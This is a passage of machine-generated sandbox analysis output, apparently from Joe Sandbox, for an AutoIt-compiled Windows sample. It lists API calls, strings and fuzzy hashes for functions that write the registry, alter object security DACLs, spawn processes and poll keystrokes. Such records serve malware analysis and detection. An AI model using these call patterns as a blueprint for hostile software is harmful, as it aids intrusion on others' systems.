                                        • GetStockObject.GDI32(00000011), ref: 00C08A76
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C08A81
                                          • Part of subcall function 00C0912D: GetCursorPos.USER32(?), ref: 00C09141
                                          • Part of subcall function 00C0912D: ScreenToClient.USER32(00000000,?), ref: 00C0915E
                                          • Part of subcall function 00C0912D: GetAsyncKeyState.USER32(00000001), ref: 00C09183
                                          • Part of subcall function 00C0912D: GetAsyncKeyState.USER32(00000002), ref: 00C0919D
                                        • SetTimer.USER32(00000000,00000000,00000028,00C090FC), ref: 00C08AA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: 0b721e2f5712243f90762296eaa4fbe72f4f69eb0cafa03bc8afaeadd3bf8cce
                                        • Instruction ID: ae6d39cf91183e12c95fe4338ab8ae9a7da755d41d4ebe369e4767a7d030cce2
                                        • Opcode Fuzzy Hash: 0b721e2f5712243f90762296eaa4fbe72f4f69eb0cafa03bc8afaeadd3bf8cce
                                        • Instruction Fuzzy Hash: 96B18A71A0020A9FDF14DFA8CC85BAE3BB5FB49314F158229FA15A72D0DB34E940DB65
                                        APIs
                                          • Part of subcall function 00C510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51114
                                          • Part of subcall function 00C510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51120
                                          • Part of subcall function 00C510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C5112F
                                          • Part of subcall function 00C510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51136
                                          • Part of subcall function 00C510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C5114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C50DF5
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C50E29
                                        • GetLengthSid.ADVAPI32(?), ref: 00C50E40
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00C50E7A
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C50E96
                                        • GetLengthSid.ADVAPI32(?), ref: 00C50EAD
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C50EB5
                                        • HeapAlloc.KERNEL32(00000000), ref: 00C50EBC
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C50EDD
                                        • CopySid.ADVAPI32(00000000), ref: 00C50EE4
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C50F13
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C50F35
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C50F47
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50F6E
                                        • HeapFree.KERNEL32(00000000), ref: 00C50F75
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50F7E
                                        • HeapFree.KERNEL32(00000000), ref: 00C50F85
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50F8E
                                        • HeapFree.KERNEL32(00000000), ref: 00C50F95
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C50FA1
                                        • HeapFree.KERNEL32(00000000), ref: 00C50FA8
                                          • Part of subcall function 00C51193: GetProcessHeap.KERNEL32(00000008,00C50BB1,?,00000000,?,00C50BB1,?), ref: 00C511A1
                                          • Part of subcall function 00C51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C50BB1,?), ref: 00C511A8
                                          • Part of subcall function 00C51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C50BB1,?), ref: 00C511B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: 1461d07383a71a674e78923fb88d640113a7c8d7355e2e82179d352692d06e27
                                        • Instruction ID: d9ee5ba84e977bcf5516ef1ad49d148208f2107f0a14caadb7d027edd6b670c6
                                        • Opcode Fuzzy Hash: 1461d07383a71a674e78923fb88d640113a7c8d7355e2e82179d352692d06e27
                                        • Instruction Fuzzy Hash: 6971AE7590020AABDF20DFA4DC89FAEBBB8FF05341F244215F928E6191D7719A49CB74
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C4BD
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C8CC08,00000000,?,00000000,?,?), ref: 00C7C544
                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C7C5A4
                                        • _wcslen.LIBCMT ref: 00C7C5F4
                                        • _wcslen.LIBCMT ref: 00C7C66F
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C7C6B2
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C7C7C1
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C7C84D
                                        • RegCloseKey.ADVAPI32(?), ref: 00C7C881
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C7C88E
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C7C960
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 9721498-966354055
                                        • Opcode ID: 775d3de84053a46cb94935e9cc86ce9ab9ab2b188c1278e4312da63cf7446486
                                        • Instruction ID: 80239c4fda680045c01c51cf38db972da0cb4d66fe6a54a0b5ccd2e8608a11c5
                                        • Opcode Fuzzy Hash: 775d3de84053a46cb94935e9cc86ce9ab9ab2b188c1278e4312da63cf7446486
                                        • Instruction Fuzzy Hash: 351268356042019FD714DF24C891B2ABBE5FF88714F04889CF99A9B3A2DB31ED45CB85
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00C809C6
                                        • _wcslen.LIBCMT ref: 00C80A01
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C80A54
                                        • _wcslen.LIBCMT ref: 00C80A8A
                                        • _wcslen.LIBCMT ref: 00C80B06
                                        • _wcslen.LIBCMT ref: 00C80B81
                                          • Part of subcall function 00C0F9F2: _wcslen.LIBCMT ref: 00C0F9FD
                                          • Part of subcall function 00C52BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C52BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 1103490817-4258414348
                                        • Opcode ID: cc30cd3706127dcf741ec4509bd0fbf781586bf3b33b3cd08af892f5f4fe6b7d
                                        • Instruction ID: 8f5f588642bc1d52e147218d1eac8f56d5682b4c8b406b6d12d357d8c3fdee75
                                        • Opcode Fuzzy Hash: cc30cd3706127dcf741ec4509bd0fbf781586bf3b33b3cd08af892f5f4fe6b7d
                                        • Instruction Fuzzy Hash: DFE19F352083018FC754EF25C45096AB7E1FF99318F24899DF8A65B3A2DB30EE49DB85
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 1256254125-909552448
                                        • Opcode ID: 6ae530524d84d075d41598a1da4ad0675f98b26e2118d5232ec981822d67eb17
                                        • Instruction ID: 4ec48b54fdc509c085fc022b99f3e6b584b69f0690f2a362e7b9f272bebaf27f
                                        • Opcode Fuzzy Hash: 6ae530524d84d075d41598a1da4ad0675f98b26e2118d5232ec981822d67eb17
                                        • Instruction Fuzzy Hash: 4571D87260012B8BCF20DE79C9D15FE3395ABA5764F15852CFC6DA7284E631CE85D3A0
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C8835A
                                        • _wcslen.LIBCMT ref: 00C8836E
                                        • _wcslen.LIBCMT ref: 00C88391
                                        • _wcslen.LIBCMT ref: 00C883B4
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C883F2
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C85BF2), ref: 00C8844E
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C88487
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C884CA
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C88501
                                        • FreeLibrary.KERNEL32(?), ref: 00C8850D
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C8851D
                                        • DestroyIcon.USER32(?,?,?,?,?,00C85BF2), ref: 00C8852C
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C88549
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C88555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 799131459-1154884017
                                        • Opcode ID: 9570de4d617f2d31ea1b7c80c49e6c118de7b999a9f82eaa94594bd2ae83c984
                                        • Instruction ID: dc8311c97a6d7605b0a9216005fbf1081a9299450177504f35ce0fbb57d1ed39
                                        • Opcode Fuzzy Hash: 9570de4d617f2d31ea1b7c80c49e6c118de7b999a9f82eaa94594bd2ae83c984
                                        • Instruction Fuzzy Hash: 9F61FF72500209BEEB14EF64CC81BFE77A8BF04711F504219F825E64D1DB74AA88DBA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 0-1645009161
                                        • Opcode ID: 1c39f0f1fdac0f55ed04d622003f063ec7189433b9b341b91b1f35d2c566ee2b
                                        • Instruction ID: 53c23219e75e5be036f8843ef298c099d54e324e89db1f62e929e4aa676d4639
                                        • Opcode Fuzzy Hash: 1c39f0f1fdac0f55ed04d622003f063ec7189433b9b341b91b1f35d2c566ee2b
                                        • Instruction Fuzzy Hash: D881C471654209BBDB20BF60CC42FBE77A8EF15340F0440B4FA05AB196EB70DA59E7A5
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 00C55A2E
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C55A40
                                        • SetWindowTextW.USER32(?,?), ref: 00C55A57
                                        • GetDlgItem.USER32(?,000003EA), ref: 00C55A6C
                                        • SetWindowTextW.USER32(00000000,?), ref: 00C55A72
                                        • GetDlgItem.USER32(?,000003E9), ref: 00C55A82
                                        • SetWindowTextW.USER32(00000000,?), ref: 00C55A88
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C55AA9
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C55AC3
                                        • GetWindowRect.USER32(?,?), ref: 00C55ACC
                                        • _wcslen.LIBCMT ref: 00C55B33
                                        • SetWindowTextW.USER32(?,?), ref: 00C55B6F
                                        • GetDesktopWindow.USER32 ref: 00C55B75
                                        • GetWindowRect.USER32(00000000), ref: 00C55B7C
                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C55BD3
                                        • GetClientRect.USER32(?,?), ref: 00C55BE0
                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C55C05
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C55C2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                        • String ID:
                                        • API String ID: 895679908-0
                                        • Opcode ID: b7c569a50f3b2597f2a1a49efe55a67ca90388025f7752935c8f757152805a5c
                                        • Instruction ID: 518953eb3c125918d423cd010867da3bbdd1ecae5d6d3d8659cfafc056993846
                                        • Opcode Fuzzy Hash: b7c569a50f3b2597f2a1a49efe55a67ca90388025f7752935c8f757152805a5c
                                        • Instruction Fuzzy Hash: 3F71A035900B059FCB20DFA8CD99BAEBBF5FF48705F100528E552A25A0D774E944CB54
                                        APIs
                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C100C6
                                          • Part of subcall function 00C100ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00CC070C,00000FA0,55DBD47D,?,?,?,?,00C323B3,000000FF), ref: 00C1011C
                                          • Part of subcall function 00C100ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C323B3,000000FF), ref: 00C10127
                                          • Part of subcall function 00C100ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C323B3,000000FF), ref: 00C10138
                                          • Part of subcall function 00C100ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C1014E
                                          • Part of subcall function 00C100ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C1015C
                                          • Part of subcall function 00C100ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C1016A
                                          • Part of subcall function 00C100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C10195
                                          • Part of subcall function 00C100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C101A0
                                        • ___scrt_fastfail.LIBCMT ref: 00C100E7
                                          • Part of subcall function 00C100A3: __onexit.LIBCMT ref: 00C100A9
                                        Strings
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C10122
                                        • InitializeConditionVariable, xrefs: 00C10148
                                        • SleepConditionVariableCS, xrefs: 00C10154
                                        • kernel32.dll, xrefs: 00C10133
                                        • WakeAllConditionVariable, xrefs: 00C10162
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 66158676-1714406822
                                        • Opcode ID: 98c55854745d3281cfd06899a6ed5cbf8e975fbc2d05244dd98d068d37dc3a92
                                        • Instruction ID: c21067f8df2686b54a34dc80392e09959991b09be40c5f9927dd8054344e0e60
                                        • Opcode Fuzzy Hash: 98c55854745d3281cfd06899a6ed5cbf8e975fbc2d05244dd98d068d37dc3a92
                                        • Instruction Fuzzy Hash: 6521D732644710BBE7106B64EC8ABAE3394EB06F51F30013EF911E26D1DFB498C09BA4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 176396367-1603158881
                                        • Opcode ID: 7892502f5ca6a21cbb078b38c5c4bffcd52bacf980b86ceedee8715d337ddc93
                                        • Instruction ID: 432186bf475fc8d2bdf31217d437be6698e41153800615155627ba2eb828d26f
                                        • Opcode Fuzzy Hash: 7892502f5ca6a21cbb078b38c5c4bffcd52bacf980b86ceedee8715d337ddc93
                                        • Instruction Fuzzy Hash: 74E11636A005569BCF189F74C8417EEFBB0BF44791F548129E866A7240DB30AFCD9794
                                        APIs
                                        • CharLowerBuffW.USER32(00000000,00000000,00C8CC08), ref: 00C64527
                                        • _wcslen.LIBCMT ref: 00C6453B
                                        • _wcslen.LIBCMT ref: 00C64599
                                        • _wcslen.LIBCMT ref: 00C645F4
                                        • _wcslen.LIBCMT ref: 00C6463F
                                        • _wcslen.LIBCMT ref: 00C646A7
                                          • Part of subcall function 00C0F9F2: _wcslen.LIBCMT ref: 00C0F9FD
                                        • GetDriveTypeW.KERNEL32(?,00CB6BF0,00000061), ref: 00C64743
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharDriveLowerType
                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2055661098-1000479233
                                        • Opcode ID: 00f5d6ddba6c1d63eb7b461467794df4930adc84e882be23607fc6f5e9743a2e
                                        • Instruction ID: c008437aa766fb3db53370e8bbf2349090003d04276045d4f5b9e7b366ad418f
                                        • Opcode Fuzzy Hash: 00f5d6ddba6c1d63eb7b461467794df4930adc84e882be23607fc6f5e9743a2e
                                        • Instruction Fuzzy Hash: 82B1F3716083029FC728DF28C8D0A7EB7E5AFA5760F50491DF5A6C7291DB30DA49CB62
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C7B198
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7B1B0
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7B1D4
                                        • _wcslen.LIBCMT ref: 00C7B200
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7B214
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7B236
                                        • _wcslen.LIBCMT ref: 00C7B332
                                          • Part of subcall function 00C605A7: GetStdHandle.KERNEL32(000000F6), ref: 00C605C6
                                        • _wcslen.LIBCMT ref: 00C7B34B
                                        • _wcslen.LIBCMT ref: 00C7B366
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7B3B6
                                        • GetLastError.KERNEL32(00000000), ref: 00C7B407
                                        • CloseHandle.KERNEL32(?), ref: 00C7B439
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7B44A
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7B45C
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7B46E
                                        • CloseHandle.KERNEL32(?), ref: 00C7B4E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                        • String ID:
                                        • API String ID: 2178637699-0
                                        • Opcode ID: d303e55def657d4b6d3c91c18e44f7f722dea49fcd7e0a1fe9cadfdb407778eb
                                        • Instruction ID: c09022f5398b15383625ce15e2fa28b59889ea8444c3751ebc2478f4bd13aad9
                                        • Opcode Fuzzy Hash: d303e55def657d4b6d3c91c18e44f7f722dea49fcd7e0a1fe9cadfdb407778eb
                                        • Instruction Fuzzy Hash: 06F1AC716083009FC724EF24C891B6FBBE5AF85314F14859DF9A99B2A2CB31ED45CB52
                                        APIs
                                        • GetMenuItemCount.USER32(00CC1990), ref: 00C32F8D
                                        • GetMenuItemCount.USER32(00CC1990), ref: 00C3303D
                                        • GetCursorPos.USER32(?), ref: 00C33081
                                        • SetForegroundWindow.USER32(00000000), ref: 00C3308A
                                        • TrackPopupMenuEx.USER32(00CC1990,00000000,?,00000000,00000000,00000000), ref: 00C3309D
                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C330A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
